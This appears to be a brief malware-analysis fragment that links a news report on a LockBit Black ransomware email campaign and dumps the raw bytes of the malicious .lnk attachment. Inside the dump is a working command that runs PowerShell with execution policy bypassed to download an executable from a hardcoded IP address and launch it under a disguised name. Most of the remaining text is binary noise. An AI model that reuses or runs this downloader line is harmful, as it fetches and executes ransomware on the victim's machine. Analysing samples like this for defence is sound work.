https://www.msspalert.com/news/lockbit-black-ransomware-campaign-spraying-millions-of-messages
The contents of the document in one email looks like this:
cat Document/Document.doc.lnk L�F� r��tg��oH��}�a��tg���5P�O� �:i�+00�/C:\V1�[G�Windows@ ヌOwH$\L�.Y��:WindowsZ1$\jSystem32B ヌOwH$\��.U�WֲSystem32V2��X�� cmd.exe@ ᄊX��$\��.jg�4�cmd.exeJ-Im4/FC:\Windows\System32\cmd.exe!..\..\..\Windows\System32\cmd.exe�/c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://178.16.54.109/spl.exe','%userprofile%\windrv.exe');Start-Process '%userprofile%\windrv.exe' shell32.dll�%windir%\System32\cmd.exe%windir%\System32\cmd.exe�%� �wN��]N�D.��Q���`�Xdesktop-4mksc1r~N8��jEJ�s@d����u^Y��'� ~N8��jEJ�s@d����u^Y��'� � ��1SPS��XF�L8C���&�m�m-S-1-5-21-711635060-3631344071-1154681243-50091SPS�mD��pH�H@.�=x�hHN�!"0